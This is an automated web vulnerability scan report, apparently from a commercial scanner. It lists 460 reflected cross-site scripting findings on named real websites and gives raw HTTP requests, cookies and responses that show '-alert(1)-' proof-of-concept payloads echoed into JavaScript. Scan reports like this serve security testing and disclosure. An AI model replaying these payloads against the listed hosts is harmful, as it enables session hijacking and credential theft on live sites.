1.324. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_input.hidden_rf parameter]

1.325. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_input.peopletravelling parameter]

1.326. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_number_of_children parameter]

1.327. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_number_of_rf parameter]

1.328. https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.hidden_rf parameter]

1.329. https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.peopletravelling parameter]

1.330. https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_children parameter]

1.331. https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_rf parameter]

1.332. http://www.nations-baseball.com/index.cfm [event parameter]

1.333. http://www.northeastassembly.org/favicon.ico [REST URL parameter 1]

1.334. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 1]

1.335. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 2]

1.336. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 3]

1.337. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 4]

1.338. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 1]

1.339. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 2]

1.340. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 3]

1.341. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 4]

1.342. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 1]

1.343. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 2]

1.344. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 3]

1.345. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 4]

1.346. http://www.nydailynews.com/index.html [REST URL parameter 1]

1.347. http://www.nydailynews.com/news/index.html [REST URL parameter 1]

1.348. http://www.nydailynews.com/news/index.html [REST URL parameter 2]

1.349. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 1]

1.350. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 2]

1.351. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 3]

1.352. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 4]

1.353. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 5]

1.354. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 6]

1.355. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [REST URL parameter 1]

1.356. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [batchId parameter]

1.357. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-id parameter]

1.358. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-methodName parameter]

1.359. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-scriptName parameter]

1.360. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [callCount parameter]

1.361. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 1]

1.362. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 2]

1.363. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 3]

1.364. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 4]

1.365. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 5]

1.366. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 6]

1.367. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 7]

1.368. http://www.nydailynews.com/sports/index.html [REST URL parameter 1]

1.369. http://www.nydailynews.com/sports/index.html [REST URL parameter 2]

1.370. http://www.opinionlab.com/content [name of an arbitrarily supplied request parameter]

1.371. http://www.opinionlab.com/content/ [name of an arbitrarily supplied request parameter]

1.372. http://www.rbisaleschallenge.com/ [name of an arbitrarily supplied request parameter]

1.373. http://www.rbisaleschallenge.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.374. http://www.rightnow.com/company-contact.php [REST URL parameter 1]

1.375. http://www.rightnow.com/company-contact.php [name of an arbitrarily supplied request parameter]

1.376. http://www.rightnow.com/cx.html [REST URL parameter 1]

1.377. http://www.rightnow.com/cx.html [name of an arbitrarily supplied request parameter]

1.378. http://www.rightnow.com/cx.php [REST URL parameter 1]

1.379. http://www.rightnow.com/cx.php [name of an arbitrarily supplied request parameter]

1.380. http://www.rightnow.com/favicon.ico [REST URL parameter 1]

1.381. http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 1]

1.382. http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 2]

1.383. http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 3]

1.384. http://www.rightnow.com/helvetica-bold-webfont.woff [REST URL parameter 1]

1.385. http://www.rightnow.com/helvetica-light-webfont.woff [REST URL parameter 1]

1.386. http://www.rightnow.com/helvetica-webfont.ttf [REST URL parameter 1]

1.387. http://www.rightnow.com/helvetica-webfont.woff [REST URL parameter 1]

1.388. http://www.rightnow.com/helvetica_bold-webfont.woff [REST URL parameter 1]

1.389. http://www.rightnow.com/helvetica_light-normal-webfont.woff [REST URL parameter 1]

1.390. http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 1]

1.391. http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 2]

1.392. http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 3]

1.393. http://www.rightnow.com/javascript/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]

1.394. http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 1]

1.395. http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 2]

1.396. http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 3]

1.397. http://www.rightnow.com/javascript/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]

1.398. http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 1]

1.399. http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 2]

1.400. http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 3]

1.401. http://www.rightnow.com/javascript/floatbox/options.js [name of an arbitrarily supplied request parameter]

1.402. http://www.rightnow.com/javascript/form.110610.js [REST URL parameter 1]

1.403. http://www.rightnow.com/javascript/form.110610.js [REST URL parameter 2]

1.404. http://www.rightnow.com/javascript/form.110610.js [name of an arbitrarily supplied request parameter]

1.405. http://www.rightnow.com/javascript/omniture_variable_setup.js [REST URL parameter 1]

1.406. http://www.rightnow.com/javascript/omniture_variable_setup.js [REST URL parameter 2]

1.407. http://www.rightnow.com/javascript/omniture_variable_setup_part2.js [REST URL parameter 1]

1.408. http://www.rightnow.com/javascript/omniture_variable_setup_part2.js [REST URL parameter 2]

1.409. http://www.rightnow.com/javascript/ooyalabacklotapi.php [REST URL parameter 1]

1.410. http://www.rightnow.com/javascript/ooyalabacklotapi.php [REST URL parameter 2]

1.411. http://www.rightnow.com/javascript/rightnow.tv.player.swf [REST URL parameter 1]

1.412. http://www.rightnow.com/javascript/rightnow.tv.player.swf [REST URL parameter 2]

1.413. http://www.rightnow.com/javascript/s_code.js [REST URL parameter 1]

1.414. http://www.rightnow.com/javascript/s_code.js [REST URL parameter 2]

1.415. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 1]

1.416. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 2]

1.417. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 3]

1.418. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]

1.419. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 1]

1.420. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 2]

1.421. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 3]

1.422. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]

1.423. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 1]

1.424. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 2]

1.425. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 3]

1.426. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [name of an arbitrarily supplied request parameter]

1.427. http://www.rightnow.com/mobile.css [REST URL parameter 1]

1.428. http://www.rightnow.com/mobile.css [name of an arbitrarily supplied request parameter]

1.429. http://www.rightnow.com/rightnow_secondary.css [REST URL parameter 1]

1.430. http://www.rightnow.com/rightnow_secondary.css [name of an arbitrarily supplied request parameter]

1.431. http://www.rightnow.com/search/ [REST URL parameter 1]

1.432. http://www.rightnow.com/search/ [name of an arbitrarily supplied request parameter]

1.433. http://www.rightnow.com/search/ [q parameter]

1.434. http://www.rightnow.com/search/ [q parameter]

1.435. http://www.robtex.com/ext/soc/x [url parameter]

1.436. https://www.superinn.com/copy1/ResMain.asp [crypt parameter]

1.437. https://www.superinn.com/frametest.asp [dk parameter]

1.438. https://www.superinn.com/frametest.asp [nightnum parameter]

1.439. https://www.superinn.com/frametest.asp [nip parameter]

1.440. https://www.superinn.com/frametest.asp [propid parameter]

1.441. https://www.superinn.com/frametest.asp [rd parameter]

1.442. https://www.superinn.com/frametest.asp [rddate parameter]

1.443. https://www.superinn.com/frametest.asp [wrnum parameter]

1.444. http://www.tigerdirect.com/applications/SearchTools/search.asp [keywords parameter]

1.445. http://www.tigerdirect.com/applications/SearchTools/search.asp [keywords parameter]

1.446. http://www.tigerdirect.com/applications/SearchTools/search.asp [keywords parameter]

1.447. http://www.tigerdirect.com/applications/SearchTools/search.asp [name of an arbitrarily supplied request parameter]

1.448. http://www.tigerdirect.com/go/windows-7/ [srkey parameter]

1.449. http://www.voanews.com/english/news/middle-east/Analysts-Question-Merit-of-Palestinian-UN-Bid--130650528.html [name of an arbitrarily supplied request parameter]

1.450. http://www.win-rar.com/index.php [dl parameter]

1.451. http://www.win-rar.com/index.php [name of an arbitrarily supplied request parameter]

1.452. https://www.zulily.com/index.php/customer/account/create/ [name of an arbitrarily supplied request parameter]

1.453. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [Referer HTTP header]

1.454. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [Referer HTTP header]

1.455. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

1.456. http://www.tigerdirect.com/applications/SearchTools/search.asp [Referer HTTP header]

1.457. http://www.tigerdirect.com/applications/SearchTools/search.asp [Referer HTTP header]

1.458. https://www.zulily.com/index.php/customer/account/create/ [Referer HTTP header]

1.459. http://a.collective-media.net/cmadj/ns.informit/homepage [cli cookie]

1.460. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [cli cookie]



1. Cross-site scripting (reflected)
There are 460 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29f0'-alert(1)-'495cc3a8968 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.nydailynewse29f0'-alert(1)-'495cc3a8968/be_news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGx1amJvdChnaWQkZjZmN2Q0ZGEtYzQ2YS0xMWUwLWEyYjQtM2YyMmYzYmY4YzBlLHN0JDEzMTMxMDI0NTEwMTI0OTUsc2kkNTA1NTUxLHYkMS4wLGFpZCQ1Rm1rTGtTMHF1by0sY3QkMjUseWJ4JENHT1hoNkprY2dYREtYc2F3QUhrTVEsciQwKSk/1/*;ord=1313102451.47533? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:36 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:36 GMT
Content-Length: 465

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.nydailynewse29f0'-alert(1)-'495cc3a8968/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.2. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54ed7'-alert(1)-'b5d97559d24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.nydailynews/be_news_fr54ed7'-alert(1)-'b5d97559d24;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGx1amJvdChnaWQkZjZmN2Q0ZGEtYzQ2YS0xMWUwLWEyYjQtM2YyMmYzYmY4YzBlLHN0JDEzMTMxMDI0NTEwMTI0OTUsc2kkNTA1NTUxLHYkMS4wLGFpZCQ1Rm1rTGtTMHF1by0sY3QkMjUseWJ4JENHT1hoNkprY2dYREtYc2F3QUhrTVEsciQwKSk/1/*;ord=1313102451.47533? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:38 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:38 GMT
Content-Length: 465

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr54ed7'-alert(1)-'b5d97559d24;sz=728x90;net=q1;ord=1313102451.47533?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.3. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.nydailynews/be_news_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2432'-alert(1)-'629570ea7b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.nydailynews/be_news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGx1amJvdChnaWQkZjZmN2Q0ZGEtYzQ2YS0xMWUwLWEyYjQtM2YyMmYzYmY4YzBlLHN0JDEzMTMxMDI0NTEwMTI0OTUsc2kkNTA1NTUxLHYkMS4wLGFpZCQ1Rm1rTGtTMHF1by0sY3QkMjUseWJ4JENHT1hoNkprY2dYREtYc2F3QUhrTVEsciQwKSk/1/*;ord=1313102451.47533?&c2432'-alert(1)-'629570ea7b8=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:34 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:34 GMT
Content-Length: 468

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?&c2432'-alert(1)-'629570ea7b8=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.nydailynews/be_news_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfab9'-alert(1)-'5998b10273a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.nydailynews/be_news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGx1amJvdChnaWQkZjZmN2Q0ZGEtYzQ2YS0xMWUwLWEyYjQtM2YyMmYzYmY4YzBlLHN0JDEzMTMxMDI0NTEwMTI0OTUsc2kkNTA1NTUxLHYkMS4wLGFpZCQ1Rm1rTGtTMHF1by0sY3QkMjUseWJ4JENHT1hoNkprY2dYREtYc2F3QUhrTVEsciQwKSk/1/*;ord=1313102451.47533?cfab9'-alert(1)-'5998b10273a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:32 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:32 GMT
Content-Length: 465

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?cfab9'-alert(1)-'5998b10273a;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/cmadj/ns.informit/homepage [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.informit/homepage

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf09'-alert(1)-'882062a794c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.informitadf09'-alert(1)-'882062a794c/homepage;ppos=atf;kw=;tile=1;sz=728x90;net=ns;ord=3538776447530836?;ord1=418181;cmpgurl=http%253A//www.informit.com/index.aspx? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
